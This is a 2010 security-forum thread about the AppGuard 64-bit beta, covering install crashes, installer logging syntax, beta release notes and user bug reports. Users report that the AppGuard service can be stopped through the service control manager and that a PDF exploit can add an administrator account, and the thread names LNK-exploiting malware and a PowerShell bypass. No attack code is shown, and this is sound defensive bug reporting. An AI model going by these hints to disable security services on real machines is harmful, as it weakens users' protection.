AppGuard Beta is Live (64 Bit, MemoryGuard)

Discussion in 'other anti-malware software' started by Eirik, Jul 7, 2010.

Thread Status:
Not open for further replies.
  1. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    Thanks, I do have a backup of the policy. I did that some time back prior to removing the apps from it that I don't or never will use. Removing the unwanted cuts down on the unecessary roughness to the Event Viewer,lol.
     
  2. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    OK, I wanted to try this again now that I have an option to turn off MG. Upon reboot after installation, the desktop want fully load. I get the taskbar, icons on desktop and a cursor that spins. No other functions. I had to kill the power. Check disk does it's thing on re-boot. After that all I get is black screen for a desktop. What do you need?

    This command line you give me does not work
    Code:
    AppGuard6432Setup.exe /v “/L *v AppGuardInstall.log
    I am in an Admin console and yes I am in the directory of the install file. I have re-booted into Safe Mode with networking, Event Viewer shows nothing in terms of an error for BRN but that all is enabled and OK. I'm sure you're busy so I'll have to bail out on this one too. Let me know about the command line above, I would love to try again but I need to know the correct syntax.
     
    Last edited: Jul 21, 2010
  3. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Greg,

    I'm sorry about the problem.

    The command line instruction I provided was incorrect. It should be:

    AppGuardSetup.exe /v"/L*v AppGuardInstall.log

    In the string above, there should only be two spaces, after:
    - AppGuardSetup.exe
    - /v"/L*v

    Sorry, the person that provided me this information has been forced to listen to 30 minutes of Yoko Ono music. We should probably reduce this to 5 or 10 minutes, though. HR says we may have a lawsuit on our hands for causing post-traumatic disorder, and this person is suddenly afraid of dogs and seals.:D

    If this generated a Minidump file, that would tell us more.

    To clarify:
    - You did not get to do the XML tweak yet (i.e., AppGuard was utilizing an unaltered policy file when you observed the symptoms)
    - AppGuard was no longer on your test PC, your observations resulted from installing it via the command line (incorrect one), or without the command line (incorrect one), then you tried it again with the command line (incorrect one)?

    I'm passing this info to support.

    Cheers,

    Eirik
     
  4. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    Yucko Ono music, at least that was more humane than having to stare at a picture of her for 30 minutes. Please give my respects and condolences to that person.

    No, tweak was not done. Kinda pointless since all functions were lost to desktop etc.. which is strange considering Event Viewer for that time frame gave me an A+ on AG. I viewed Event Viewer from Safe Mode w/net support.

    No command line. The install file was launched from USB HD whilst AG had all protections suspended.

    Yes, I did try again to launch setup whilst in Safe Mode by using the Yoko Ono command line. It was going to be my attempt to repair install which I had hoped would generate the needed dump file but I forgot that the installer won't work in Safe Mode either,lol.

    Question: If Event Viewer was showing all was OK for AG but my OS wasn't, what's the odds of it not generating the dump file?
     
  5. Tarantula

    Tarantula Guest

    I just have downloaded and installed appguard x 64 beta, on win 7 ultimate x 64 SP1(official beta).Started with my tests and what i saw-It's a piece of cake to disable the main service of appguard>>> http://yfrog.com/n558731608p

    And this is with all options enabled.Now i can easily install whatever i want and appguard doesn't protect me anymore.Today, i've tested some AV's vs some malware and there was one that disables security center, firewall and windows defender services.What can stop it to do the same with Blue Ridge AppGuard Service?
     
  6. Kees1958

    Kees1958 Registered Member

    Joined:
    Jul 8, 2006
    Posts:
    5,857
    Well that would be very hard for malware. Some security programs like AppGuard are designed to protect with zero pop-ups for the average user.

    Average Joe/Jane

    Running Windows 7 (64 bit becasue it is put on every new PC nowadays), has UAC in default, with AppGuard you get
    a) deny write (create/delete/update) intent access to Windows and Programs Directories for guarded programs
    b) deny write (setting values, creating/deleting subkeys, etc) for HKLM registry hive
    c) deny execute on user space (Users and Programs Data directories)
    d) memory violation protection

    Question:
    How would a process running low or medium rights plus the protection of AppGuard be able to end system processes?

    Regards Kees
     
  7. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Hi Tarantula,

    Thank you for participating in our beta. You've just made a helpful contribution to the beta. Engineering has declared this termination of the AppGuard service a bug.

    I'm assuming that you used the service control manager (SCM) to terminate the AppGuard service. Is that correct? If not, please elaborate.

    Cheers,

    Eirik
     
  8. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Thank you Kees.

    AppGuard also suppresses script launches from user-space. I believe that includes (sorry, top of mind answer here): .bat, .vbs, .com, .cmd. I'm trying to remember others...

    Are there other script types that you all consider too dangerous to be allowed to run from user-space? Please let me know.

    Also, MSI files are not allowed to launch from user-space, unless digitally signed by Microsoft. We'll add other trusted publishers.

    Other user-space protection features are under consideration right now.

    Cheers,

    Eirik
     
  9. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    This Windows LNK vulnerability hype has made for some interesting discussions. And from time to time, our 'high-value target' enterprise customers send us malware samples. This week we received roughly the same sample from multiple sources wishing to confirm MemoryGuard at work. I'm mentioning this because this sample is widely reported to affect both enterprise and consumer PCs. And, because it involves MemoryGuard, our beta.

    Its a download that makes use of the LNK vulnerability with names such as W32.Changeup (Symantec), W32/Autorun.BFG (Sophos), Win32/AutoRun.VB.RD (Eset), Worm:Win32/Vobfus.R (Microsoft), Download-CJX (McAfee), TR/Dldr.Gaat.B (Avira).

    As Wilders folk would expect, and as I wrote in our blog "AppGuard Snuffs-Out Windows LNK Vulnerability Zero-Day Attacks", the LNK vulnerability alone is not that remarkable give the oldest of AppGuard protection features.

    The sample gets interesting when one lets the downloader run, unguarded, without privacy mode, or anything but MemoryGuard restricting it. Here's a screenshot from AppGuard (beta):

    http://www.blueridgenetworks.com/securitynowblog/wp-content/uploads/2010/07/Rieonim_LNK-Malware-Blocked-by-MG21.jpg

    Frankly, I was surprised because in the one or two write-ups on the Internet that I had read did not mention code injections. But, I'm not a professional malware ...

    Are you seeing MemoryGuard intercepting malware in consumer space?

    We've gained some useful insights regarding MemoryGuard 'out of the lab'. I believe you'll be quite pleased with it in AppGuard 2.x next month (possibly September). Its still important for us to continue to receive log files from your beta1 and soon beta2 observations.

    Barring any last minute Quality issues, we'll release beta 2 Thursday evening (eastern daylight time) next week.

    Cheers,

    Eirik
     
    Last edited: Jul 23, 2010
  10. Tarantula

    Tarantula Guest


    You are welcome!And yes, that's right.:)

    edit:One question-Is this the correct email, that i'm supposed to use for feedback-> appguard@blueridgene­tworks.com
    I'm asking, because i have a file(pdf exploit), that creates an administrator account, without a notice by appguard and I want to send it to You.
     
    Last edited by a moderator: Jul 23, 2010
  11. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Yes, thanks for the file. I'm looking forward to hearing what our folk say.

    Btw, I've got many activation codes to send out. I'll do so tonight.

    Thanks again for the helpful feedback.

    Cheers

    Eirik
     
  12. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    It's still incorrect at least for the Beta, it should be

    Code:
    AppGuard6432Setup.exe /v"/L*v AppGuardInstall.log
    Anyway, unless I'm missing it somewhere, it didn't create a log file. This time the install worked without crashing the desktop but for some reason, no Memory Guard alerts. I haven't tried the xml tweak yet so it's not that. Memory Guard is working because like the last install, Avast will not update and two other apps I usually run willl not work. I'm just not getting the alerts.



    There is no <bPreventCodeInjection> in ProgramData. I have that entry in my User folder xml policy. Which is correct? I'm confused

    I'm getting the feeling this install is botched as well.

    Update: My feelings were correct. I re-booted to the crashed black desktop with nothing left to do but kill the power and restore.
     
    Last edited: Jul 23, 2010
  13. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Greg,

    I'm very disappointed that you've encountered these problems. I apologize for your inconvenience. I've asked developers to contact you via your email.

    I agree with your expedient resolution: 'restore'.

    Eirik
     
  14. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    As a last ditch effort, I uninstalled the release version and nuked everything BRN from the HD and Registry. Installed the Beta, edited the XML policy and all appears to be well. I'm sorry I couldn't provide any useful info but as mentioned earlier, even though it wouldn't allow my desktop to load, Event Viewer stated that everything was fine. Have you changed my license info? Can I install this on my wifes x64 using my present license?
     
  15. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    I have this(rescache.hit) set in Malware Defender to ask on everything.
    Code:
    07/26/10 16:13:19 Prevented process <Internet Explorer> from writing to <e:\windows\rescache\rc0007\rescache.hit>.
    
    Why is AG alerting me to such a thing when Malware Defender is not. I have tested Malware Defender ask policy on this particular file and it will warn if anything is attempted but when AG alerts me, I get no warning from MD. Should I allow this one file in AG's exceptions? It is possible that if in fact AG has prevented this then MD would not even have a chance to chime in. Curious
     
  16. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    I don't recognize it. My rule of thumb: if a block hadn't 'broke' anything, don't create an exception, especially if the action is unknown.

    As for MD, your speculation may be correct. Unfortunately, I don't know.
     
  17. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Hi all,

    We need to delay beta 2 until Monday. The QA folks found a bug we consider a showstopper. Sorry.

    Eirik
     
  18. tonyf1971

    tonyf1971 Registered Member

    Joined:
    Nov 20, 2007
    Posts:
    58

    do you still want additional log files from beta 1 or shall i wait until beta 2 before submitting more ?
     
  19. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    All logs are potentially helpful. If I had to choose, then I'd wait for beta 2 logs.

    Thanks,

    Eirik
     
  20. 1000db

    1000db Registered Member

    Joined:
    Jan 9, 2009
    Posts:
    718
    Location:
    Missouri
    Can we have a status update? Is the "show stopper" resolved?
     
  21. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    You just beat me to the punch... Our webmaster was unavailable and could not post the new beta until about an hour ago. Its live!!!

    So what's new in beta2?

    To begin with, MemoryGuard has an enable/disable button. The refinements we have in mind will be in the next release (2.1.x) later this month, possibly early September. This will not be a beta release. For beta 2, we ask that you enable MemoryGuard to gather log data. Be warned, in its present form, MemoryGuard blocks many legit actions by antivirus software and a few Windows facilities. We need your log data to better refine MemoryGuard for the 2.1 release coming soon. Please run MemoryGuard long enough to generate extensive blocking event logs, which can help us define even better refinements.

    Beta2 adds the following to what you saw in Beta1:

    - Parental Controls (please read the embedded Help for details)
    - MBRguard is integrated into AppGuard
    - Ignore Messages
    - Enhanced User-Space Protection, we're renaming 'Drive-by Download Protection' to 'User-Space Protection'
    - Update alert

    More details and the download here:
    http://www.blueridgenetworks.com/support/appguard6432/

    I should like to also clarify a system requirement that we failed to communicate. AppGuard on Vista requires Service Pack 1 (and later).

    As many of you probably know by now, David Kennedy reported and demonstrated a vulnerability that allows an attacker to elude built-in PowerShell restrictions. Apparently, no AV or HIPS product can stop such attacks, though I wouldn't care to make so bold a statement myself other than merely repeat what others assert. I hear these attacks also elude software restriction policies (SRP). We have NOT verified this!!! Kennedy has released MetaSploit modules, btw. We expect attacks in the wild soon.

    I mention this PowerShell vulnerability because we believe AppGuard beta 2 will stop such attacks from user-space by default. Those that add powershell.exe to the 'guard list' enjoy a higher degree of protection from a less common vector where the PowerShell code is executed by a 'trusted' application (I use this term loosely as we do NOT really 'trust' applications). This latter form of attack tends to be executed by more sophisticated cyber criminals on high value targets such as government organizations and large corporations. As per the beta, we would greatly appreciate your feedback on the guarding of powershell.exe.

    We look forward to your feedback and would appreciate your spreading the word. Beta participants get a free lifetime license for up to three concurrent computers.

    Cheers,

    Eirik
     
  22. pegr

    pegr Registered Member

    Joined:
    Apr 8, 2008
    Posts:
    2,280
    Location:
    UK
    Hi Eirik,

    I have two questions relating to the new version.

    Q1. Will there also be enhanced System-Space protection in the new version? This is something we've discussed previously.

    The scenario I have in mind is this: Many machines come with a pre-installed system recovery partition as well as the partition that the system boots from. As non-system partitions are automatically treated by AppGuard 1.4.7 as Extended User-Space, there needs to be a way for the user to add exclusions to move selected drive letters, folders, and sub-folders from User-Space into System-Space, in order to protect them against being written to by Guarded Applications.

    In AppGuard 1.4.7, the Drive-By Download Protection Settings has two tabs: Allow and Deny. If the Guarded Applications Exception Folders Settings also had a Deny tab in addition to the (implicit) Allow tab, it would not only enable the user to allow Guarded Applications write access to the specified folders, it would also enable the user to deny Guarded Applications write access to the specified folders.

    It would be nice to see the AppGuard 2.x GUI provide better transparency regarding what constitutes System-Space and User-Space, combined with the flexibility for customisation to move folders in both directions between the two. Whilst the concept is both brilliant and simple, I've always thought that the implementation in AppGuard 1.4.7 is incomplete and lacks clarity.

    Q2. As you are aware from previous conversations, AppGuard is adding around 20 seconds to the boot times on my Windows XP system. You did say that the engineers had found what they thought was a problem with the licensing code that may be causing this problem. Has this now been fixed in the new version?

    TIA.

    Regards
     
  23. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Per your first question, you made two excellent points. We were unable to get the requested 'enhanced system space' into beta2. I'll have to get back to you on when we will. On the second point about improving the GUI, particularly in terms of displaying what user-space is at the moment (add/remove an external hard drive, one changes user-space), that is very much what I want the AppGuard GUI to do. In fact, I had hoped to get this into beta1 but had to surrender it this time around to other features.

    On the second question regarding prolonged boot times, yes we have implemented changes that we hope significantly improves this insofar as the licensing was delaying things. If however, there was a different, undiscovered cause or contributor, then we probably didn't fully solve the issue. If the problem was not solved, please let us know ASAP to improve the chances of discovering the 'other' cause and solving it before the next release.

    Cheers,

    Eirik
     
  24. pegr

    pegr Registered Member

    Joined:
    Apr 8, 2008
    Posts:
    2,280
    Location:
    UK
    Hi Eirik,

    Thanks very much for the comprehensive and helpful reply. :)

    I would very much like to test a beta version in order to see if the slow booting problem has been resolved before the next release, and also to provide any other feedback that may be of use, but it appears that Windows XP is not a supported operating system for the current beta.

    Regards
     
  25. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    Eirik, I don't think you ever answered my question as to where the AppGuardInstall.log is located but I have just now downloaded the latest version for install and noticed the log file in the folder of the last beta. Do you need this log file? Do I need to run the command line again for this install just in case? Should I uninstall the previous Beta? Is this installation problem a result of me editing my XML policys? And before you ask, yes they are edited correctly I assure you. One more, is the MBR protection enabled by default? I'm still skeptical of this with the likes of Comodo Time Machine, Eaz-Fix etc..

    One thing I noticed in the log file
    Code:
    MSI (c) (00:30) [18:46:03:578]: Cleaning up uninstalled install packages, if any exist
    For me, AG does not do this. At one time, I had four different installers in the Windows/Installer folder.

    Also, the download link gives me the previous beta according to the install. The options I get are to remove, repair etc.. Right click, Save Target as seems to give me the correct file.

    Update:
    Gave the latest version a try at installing. BSOD on the Welcome Screen. I also got this during install
    Untitled.png
     
    Last edited: Aug 4, 2010
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.